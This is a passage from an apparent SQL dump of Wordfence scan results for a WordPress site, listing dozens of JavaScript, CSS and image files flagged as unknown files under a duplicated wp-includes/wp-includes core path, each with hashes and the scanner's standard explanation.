More</a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill-object-fit.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27182,1631424907,1631424907,'new','knownfile',75,'ade3782b301d1afc846b3f7fccdd3606','c5d09f367994dacd70d4d881dd525620','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill-object-fit.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:68:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill-object-fit.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27183,1631424907,1631424907,'new','knownfile',75,'b72362e357ba1651749bc6ce8fd2c058','a11c30a72122275b47f79c376155be38','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill-url.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill-url.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27184,1631424907,1631424907,'new','knownfile',75,'ca712d9510130e882387d41e0b09bfad','a5e17532337c547761711eada9cb364a','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill-url.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill-url.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27185,1631424907,1631424907,'new','knownfile',75,'d00d1ce8864caa5e6a477a3463c69bc2','df9dca1fc8997f7e4eb8779f5ca64e97','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27186,1631424907,1631424907,'new','knownfile',75,'5d7abc3732f18df376490235f7b4d059','c4d38a7a379b0a60c23dd7ac96e62348','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/vendor/wp-polyfill.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/js/dist/vendor/wp-polyfill.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27187,1631424907,1631424907,'new','knownfile',75,'fd776ab0277832588d5c82800369100b','aeae7150fe190f47d9da4b7a42a300b6','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/viewport.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/dist/viewport.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27188,1631424907,1631424907,'new','knownfile',75,'b015cb1b89bbe3ad5f3c68a03e3ef09c','bf580d5c1ea3488f298fa90c3d92778d','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/viewport.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/dist/viewport.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27189,1631424908,1631424908,'new','knownfile',75,'d4cc8aafb4972ea1ba29b3b962a84147','b90598f217b4bc258f35aec7118ed8d7','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/warning.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/dist/warning.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27190,1631424908,1631424908,'new','knownfile',75,'8c6ea8756002cf7013f68107eec29fd2','2d38a4f446ee761da3509cfddb14e2f2','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/warning.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/dist/warning.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27191,1631424909,1631424909,'new','knownfile',75,'556b3e7d00721eb84925ca79756efa27','d9e0505812758790f8447afadf539d7f','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/wordcount.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/dist/wordcount.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27192,1631424909,1631424909,'new','knownfile',75,'718aed7c91d6af633cf1046407388fbf','752958ed169a6574bb0c17ce305733bf','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/wordcount.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/dist/wordcount.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27193,1631424909,1631424909,'new','knownfile',75,'10b33da81b6161c9cfd18d7f49c6d2f1','cc886e95221e5739bbac59f6fbfb35ae','Unknown file in WordPress core: wp-includes/wp-includes/js/heartbeat.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/js/heartbeat.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27194,1631424909,1631424909,'new','knownfile',75,'3142ca578e37db5aa497dc02d12d0f20','404d27b2326821f662c8439307787061','Unknown file in WordPress core: wp-includes/wp-includes/js/heartbeat.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/heartbeat.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27195,1631424909,1631424909,'new','knownfile',75,'882e13372a2fec5cd82d74b1b0c80f51','cf9ff405a30aaf71df57af537930f470','Unknown file in WordPress core: wp-includes/wp-includes/js/hoverIntent.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/js/hoverIntent.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27196,1631424909,1631424909,'new','knownfile',75,'a9ed7c2f2e6780cd62d973f8a63dabfe','4360db953d64afb25fa92ad85377d058','Unknown file in WordPress core: wp-includes/wp-includes/js/hoverIntent.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/hoverIntent.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27197,1631424909,1631424909,'new','knownfile',75,'ed8d97f1bc587718587ac3791a03379e','0501082d298e4392cd5bc5b6c32ea448','Unknown file in WordPress core: wp-includes/wp-includes/js/hoverintent-js.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/hoverintent-js.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27198,1631424909,1631424909,'new','knownfile',75,'df499be546f660735ec872717dd3e17a','ae5e86fe31065d85d1fcf809e228c900','Unknown file in WordPress core: wp-includes/wp-includes/js/imagesloaded.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/imagesloaded.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27199,1631424909,1631424909,'new','knownfile',75,'494db04a1a9fca113a5efd80afb71bae','61bad81d5a0623c8747d7773e3982a6d','Unknown file in WordPress core: wp-includes/wp-includes/js/imgareaselect/border-anim-h.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/js/imgareaselect/border-anim-h.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27200,1631424909,1631424909,'new','knownfile',75,'9e40fc0462988db8e12d9449a923d504','e728b3d05eb8b39a996d99739330c4f2','Unknown file in WordPress core: wp-includes/wp-includes/js/imgareaselect/border-anim-v.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/js/imgareaselect/border-anim-v.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27201,1631424910,1631424910,'new','knownfile',75,'8e4c5ca030e7f91ad6578d51f7e6eee4','f1741edb21b8385cfe12dfab6abf8d86','Unknown file in WordPress core: wp-includes/wp-includes/js/imgareaselect/imgareaselect.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/js/imgareaselect/imgareaselect.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27202,1631424910,1631424910,'new','knownfile',75,'3ead021a7a654c5ce41ce6927280ef42','d433107c926764f4ea1ca789e0aaeec6','Unknown file in WordPress core: wp-includes/wp-includes/js/imgareaselect/jquery.imgareaselect.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/js/imgareaselect/jquery.imgareaselect.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27203,1631424910,1631424910,'new','knownfile',75,'b19f9c1c02009dafce41810361bea02d','a378d14dfd76fca05a7482b15f3a9b20','Unknown file in WordPress core: wp-includes/wp-includes/js/imgareaselect/jquery.imgareaselect.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:68:\"wp-includes/wp-includes/js/imgareaselect/jquery.imgareaselect.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27204,1631424910,1631424910,'new','knownfile',75,'47845394fd97baca9c4fca42ad1b3fc6','a2aafc04ee6f1e4246f4484ef86cd7de','Unknown file in WordPress core: wp-includes/wp-includes/js/jcrop/Jcrop.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/jcrop/Jcrop.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27205,1631424910,1631424910,'new','knownfile',75,'0338735e5d8becf92034629443014bb4','03f2f6573707a1b564f3eda4d312692a','Unknown file in WordPress core: wp-includes/wp-includes/js/jcrop/jquery.Jcrop.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/js/jcrop/jquery.Jcrop.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27206,1631424910,1631424910,'new','knownfile',75,'5e36b771360e7df1fb83a04b08b3ebf5','d69de372a7320fb630118aee82131017','Unknown file in WordPress core: wp-includes/wp-includes/js/jcrop/jquery.Jcrop.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/jcrop/jquery.Jcrop.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27207,1631424910,1631424910,'new','knownfile',75,'8c97c2e2e4a326b56f29147b78046ee5','b6159f800c36ce90c9fccc44742dab55','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery-migrate.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/jquery/jquery-migrate.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27208,1631424910,1631424910,'new','knownfile',75,'e5de5514e2fcb6db9e732f153eb48de7','ec77fec0d866bfb4b8b18422772c5a9f','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery-migrate.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/jquery/jquery-migrate.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27209,1631424910,1631424910,'new','knownfile',75,'a28c7118b1c5279c1662f73dcf67bc80','54df4103a7d5fcc05595d9912cec7793','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery.color.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/js/jquery/jquery.color.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27210,1631424910,1631424910,'new','knownfile',75,'21abe5e52c1cd3f1a8af065dd909f403','7e07c12f46614e6658252971e01b8a28','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery.form.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/jquery/jquery.form.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27211,1631424910,1631424910,'new','knownfile',75,'804de3aae700746fe1ec67c7d91e4882','ba7a6aab719472f3421dd221be6308a1','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery.form.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/jquery/jquery.form.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27212,1631424910,1631424910,'new','knownfile',75,'6466860b1bb05e8fd9bf3ba0e79a24db','c6d637adefc9301feda1e07f8746481b','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery.hotkeys.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/jquery/jquery.hotkeys.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27213,1631424911,1631424911,'new','knownfile',75,'83834c9d1b451e34795ad05d3b4113b8','d8202dce7483ffe54185b82c9db077f9','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery.hotkeys.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/jquery/jquery.hotkeys.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27214,1631424911,1631424911,'new','knownfile',75,'75df260005b15f77e83e1f2bc98085fb','e09904360147f4c0e5779244772c91fd','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/jquery/jquery.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27215,1631424911,1631424911,'new','knownfile',75,'72a9926e32447d482f16de68bd0fb363','e573f6df66e80e0a016725305979f8b2','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery.masonry.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/jquery/jquery.masonry.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27216,1631424911,1631424911,'new','knownfile',75,'cbbf56cf14d6226d356bb3772c0797ec','5a41d56f531e936c198b4a8e150a56a6','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/jquery/jquery.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27217,1631424911,1631424911,'new','knownfile',75,'1ae87eeaaaaf2c6d55b638cf1e060cfe','f2843a01757bbedb5915da148e1ecad5','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery.query.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/jquery/jquery.query.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27218,1631424911,1631424911,'new','knownfile',75,'f7446322df273affaca00faa3c8b5677','545186c3bc2475250a4f6d16c9977397','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery.schedule.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/jquery/jquery.schedule.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27219,1631424911,1631424911,'new','knownfile',75,'e06f4c246cd027946309a490d5c1d553','11e860894c169e9b213148817fafa61c','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery.serialize-object.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/js/jquery/jquery.serialize-object.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27220,1631424911,1631424911,'new','knownfile',75,'dbd8c9aa2856973cb84b167638f637b5','bd401c1496c60a1857254a1b29b9efa4','Unknown file in WordPress core: wp-includes/wp-includes/js/jquery/jquery.table-hotkeys.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/js/jquery/jquery.table-hotkeys.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27221,1631424911,1631424911,'new','knownfile',75,'1550f6ed4af0fee36a23193e89ac7fa1','0740e1da5ccef1d0c2fc3b51e5ba2f92','Unknown file in WordPress core: 